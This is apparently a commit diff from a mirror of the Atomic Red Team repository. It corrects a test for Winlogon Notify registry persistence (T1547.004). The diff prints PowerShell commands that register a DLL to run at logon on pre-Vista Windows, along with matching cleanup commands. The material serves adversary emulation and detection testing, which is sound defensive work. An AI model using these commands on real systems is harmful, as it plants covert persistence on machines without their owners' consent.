security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Correct T1547.004 Winlogon Notification test (#2470)

Browse Source 
* Corrected T1547.004 Winlogon Notification test

* Added hint on deprecation

---------

Co-authored-by: Hare Sudhan <code@0x6c.dev>
This commit is contained in:
hRun
2023-06-24 01:09:45 +02:00
committed by GitHub
parent 3d463e9be0
commit df3e84d861
2 changed files with 22 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1547.004/T1547.004.md
+10 -4
View File
@@ -106,7 +106,9 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
**Supported Platforms:** Windows
@@ -121,19 +123,23 @@ Upon successful execution, PowerShell will modify a registry value to execute at
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | path | C:&#92;Windows&#92;Temp&#92;atomicNotificationPackage.dll|
| function_to_execute | Function in notification package to execute | string | AtomicTestFunction|
#### Attack Commands: Run with `powershell`!
```powershell
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
```
#### Cleanup Commands:
```powershell
Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force -ErrorAction Ignore
```
atomics/T1547.004/T1547.004.yaml
+12 -3
View File
@@ -47,7 +47,9 @@ atomic_tests:
description: |
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
supported_platforms:
- windows
input_arguments:
@@ -55,10 +57,17 @@ atomic_tests:
description: Path of notification package to execute
type: path
default: C:\Windows\Temp\atomicNotificationPackage.dll
function_to_execute:
description: Function in notification package to execute
type: string
default: AtomicTestFunction
executor:
command: |
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
cleanup_command: |
Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
name: powershell